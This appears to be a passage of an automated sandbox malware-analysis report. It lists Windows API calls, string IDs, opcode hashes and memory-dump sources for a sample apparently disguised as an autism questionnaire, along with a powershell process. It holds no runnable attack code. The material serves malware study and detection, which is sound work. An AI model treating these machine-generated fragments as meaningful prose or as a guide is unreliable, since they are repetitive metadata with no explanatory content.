                                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                              • API String ID: 1883125708-2676053874
                                                                                              • Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                                              • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                                                              • Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                                              • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                              • API String ID: 1883125708-2866557904
                                                                                              • Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                                              • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                                                              • Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                                              • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                              • API String ID: 1646373207-1816364905
                                                                                              • Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                                              • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                                                              • Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                                              • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                              • API String ID: 1646373207-2498399450
                                                                                              • Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                                              • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                                                              • Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                                              • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                              • API String ID: 1646373207-260599015
                                                                                              • Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                                              • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                                                              • Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                                              • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                              • API String ID: 1646373207-834958232
                                                                                              • Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                                              • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                                                              • Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                                              • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:6.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:105
                                                                                              Total number of Limit Nodes:2

                                                                                              Graph


                                                                                              Executed Functions

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HJx$HJx$HJx$HJx$HJx$HJx$HJx
                                                                                              • API String ID: 0-291125046
                                                                                              • Opcode ID: cf85f9e77cd032437fd597c214c683b9f7ffa60d5457493dc3b5bb2a56e0075a
                                                                                              • Instruction ID: 289ebe4a17b4edf2ce9a1a9c6d5dd3bad14ca4642ee78809dee75a4e05dc674b
                                                                                              • Opcode Fuzzy Hash: cf85f9e77cd032437fd597c214c683b9f7ffa60d5457493dc3b5bb2a56e0075a
                                                                                              • Instruction Fuzzy Hash: C962B174A002099FDB14EF68C485AAEB7F2FF88304F548569E409AB364DF74ED46CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8^Th$HJx$HJx$dlTh$dlTh$dlTh$dlTh$dlTh$dlTh$dlTh
                                                                                              • API String ID: 0-2825212099
                                                                                              • Opcode ID: 0157a47d9f6f8e279e2762629fd046228f5f2a2193f9bde28c8829fadf58ab43
                                                                                              • Instruction ID: 33d8faee38b71c5717951ac40aeb271d8d1c7cc4358015e78e03119fd0e9316d
                                                                                              • Opcode Fuzzy Hash: 0157a47d9f6f8e279e2762629fd046228f5f2a2193f9bde28c8829fadf58ab43
                                                                                              • Instruction Fuzzy Hash: 8D226AB5A10219EFEB24DF64D845AAEB7F2FF84314F008529E40A9B350DB75ED45CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 010256C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.455621552.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_1020000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: e64ae95959f958d6a99b10deb14e4a15d616574978d30fbd13613457067090b5
                                                                                              • Instruction ID: 7be803d86f0d61beb158166d4a9919ab8a352441c95ae2220c64d42ce36fff90
                                                                                              • Opcode Fuzzy Hash: e64ae95959f958d6a99b10deb14e4a15d616574978d30fbd13613457067090b5
                                                                                              • Instruction Fuzzy Hash: B22133B5D046299BCB14CF9AD848BEEFBF4FB48224F10815AD819B7600D774A904CFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 010256C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.455621552.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_1020000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8a4058fadab80885d20c77812815678f1abd08683a72c43927c6949b183ff106
                                                                                              • Instruction ID: 2ee43318df91c8b52f20b3af3ee09a27dcdb20bb2d7a19199da6881b659a24a5
                                                                                              • Opcode Fuzzy Hash: 8a4058fadab80885d20c77812815678f1abd08683a72c43927c6949b183ff106
                                                                                              • Instruction Fuzzy Hash: 042122B5D006599BCB14CF99D988ADEFBF4FB88224F14815AD818B7600C774AA04CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,073B4AFA), ref: 073B50E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462256851.00000000073B0000.00000040.00000010.sdmp, Offset: 073B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73b0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 3527080286-0
                                                                                              • Opcode ID: 54037fa07217d4b1bf9220736ee581c1c4b7a8bd20132be4e021911c6d26fdd6
                                                                                              • Instruction ID: 5082aafb382757449280740c3a9b6d08414ab7904725bd4cb33195ae3c83c478
                                                                                              • Opcode Fuzzy Hash: 54037fa07217d4b1bf9220736ee581c1c4b7a8bd20132be4e021911c6d26fdd6
                                                                                              • Instruction Fuzzy Hash: 5C1103B5804749CFDB20CF99D485BEEBBF8EB88214F10845AD519A7640D774A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,073B4AFA), ref: 073B50E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462256851.00000000073B0000.00000040.00000010.sdmp, Offset: 073B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73b0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 3527080286-0
                                                                                              • Opcode ID: c70ed23d8f734b0dd0b8ccd94d9b8b92983edede55bc2fc665b96861fd700da8
                                                                                              • Instruction ID: 9f917887b77dc36b9cf3f86b5ba1969abbc02d254a09093cb97102ea54f83b7c
                                                                                              • Opcode Fuzzy Hash: c70ed23d8f734b0dd0b8ccd94d9b8b92983edede55bc2fc665b96861fd700da8
                                                                                              • Instruction Fuzzy Hash: 0F1133B5800749CFDB20CF99D484BEEFBF4EB89314F20841AD518A7640D774A940CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;>h
                                                                                              • API String ID: 0-2883881028
                                                                                              • Opcode ID: 82cfb5646c5518c8a0119ba12b75bfb070056302dc4808f47751ad2a57f6b4f3
                                                                                              • Instruction ID: de437f1fad2f6d0f77991dbd43b2a4c679d147e42a6f63708655755c725e7b1d
                                                                                              • Opcode Fuzzy Hash: 82cfb5646c5518c8a0119ba12b75bfb070056302dc4808f47751ad2a57f6b4f3
                                                                                              • Instruction Fuzzy Hash: 12113AB93046125BDB24A56A8441BBBA3C7FBC4715F54842AE545DB390CFB1D84283A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;>h
                                                                                              • API String ID: 0-2883881028
                                                                                              • Opcode ID: 915f004f5a74d856cef52f0de35f3a6cfb62b071ae76c91f541a62cb666d5565
                                                                                              • Instruction ID: dbec527060311aa736a129712c271529a92d205858b175d082d4e5e66e66d6c6
                                                                                              • Opcode Fuzzy Hash: 915f004f5a74d856cef52f0de35f3a6cfb62b071ae76c91f541a62cb666d5565
                                                                                              • Instruction Fuzzy Hash: 4D119CB43083912FD72116360C11BF7BB96FB86310F588067F940DB2D2DA74A8018371
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HJx
                                                                                              • API String ID: 0-3581959147
                                                                                              • Opcode ID: 5e19dd0ba9644711db95a8ae97910c98c75378a81fb79b4f9ad0e00b7858770c
                                                                                              • Instruction ID: fc30080e27f65922a282b1ad80c18fc5f191a40dc1917dd726881c3ecc8d1b60
                                                                                              • Opcode Fuzzy Hash: 5e19dd0ba9644711db95a8ae97910c98c75378a81fb79b4f9ad0e00b7858770c
                                                                                              • Instruction Fuzzy Hash: E7F08BB63063506FC326673474150AEB79A8FC662130A407BD809C7741CF28CC0387EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ff07f7e491468b76388913dbe694e042cf0cd14ecb12341ee34f7826628b906
                                                                                              • Instruction ID: 504486690ebcab8e6f27ccaaa9373b8881e78995cde67a2fc0ece0ecef146424
                                                                                              • Opcode Fuzzy Hash: 2ff07f7e491468b76388913dbe694e042cf0cd14ecb12341ee34f7826628b906
                                                                                              • Instruction Fuzzy Hash: 835235F57042528FDB159B6888106EABBE2BFC6225F14847BD546CF3A1DB35DC42C3A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bbbdf80629d21ee032e82933f260a6a7317f84737ca5eb2149b4dacfa38c7e3
                                                                                              • Instruction ID: f6a12d8b2d4ca57105e36382cdd0b56e44bbf563c264b87e2ea8c7b03b2ad28d
                                                                                              • Opcode Fuzzy Hash: 7bbbdf80629d21ee032e82933f260a6a7317f84737ca5eb2149b4dacfa38c7e3
                                                                                              • Instruction Fuzzy Hash: F75217B57042928FCB519B7888106BABBE2AFC6215F14C4BBD545CF3A1DB75CC42C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bdd480a0fd071c5a1194d153437ab54630d83497d9e656862b5e1f6feea9678
                                                                                              • Instruction ID: f77489aa00d88ed041f6266155be06b2c8693337012566d6ba50bb47a9fb8ee4
                                                                                              • Opcode Fuzzy Hash: 7bdd480a0fd071c5a1194d153437ab54630d83497d9e656862b5e1f6feea9678
                                                                                              • Instruction Fuzzy Hash: 21324AF57043528FCB15DB7888116AF7BA2BF81219B18946BD5068F3A2EF31DC51C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cb100d44f1878854da3620b7ac1f13e412025c740aae9472f109d371232f3eb
                                                                                              • Instruction ID: 2300cced43add589169facc7a706a632aa0294f31da100a8b2f437c8f0dc1927
                                                                                              • Opcode Fuzzy Hash: 7cb100d44f1878854da3620b7ac1f13e412025c740aae9472f109d371232f3eb
                                                                                              • Instruction Fuzzy Hash: 4B223AB5704B168FCB119B7988106EEBBA2BFC6214F14846BD545CF2A1DB71C842C7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f822708e2de23c435bf5fb54f0ad133fb905b7f244e8ec3be417dc5fb1a458f
                                                                                              • Instruction ID: 9bdb7eb36d5abfc37b8a0766955149e69eada3b4c6d4a9089c62582f954a1f28
                                                                                              • Opcode Fuzzy Hash: 5f822708e2de23c435bf5fb54f0ad133fb905b7f244e8ec3be417dc5fb1a458f
                                                                                              • Instruction Fuzzy Hash: 842228B5B046428FDB109B6998506AAB7A2BFC6215F24C47FD546CF362DB31CC42C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04c8901621f0cd5a06e2567ad1caddd53b0ea13e4e9db792beaff8d5098a3162
                                                                                              • Instruction ID: b9b6842311c9f737b6ab983685987bfbc16f6bad7ddae017014dcbf20bfd40c7
                                                                                              • Opcode Fuzzy Hash: 04c8901621f0cd5a06e2567ad1caddd53b0ea13e4e9db792beaff8d5098a3162
                                                                                              • Instruction Fuzzy Hash: 18B109B4E0021ADFDB14DFA8C484A9DBBB2FF88304F548569E409AB365DB71A945CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
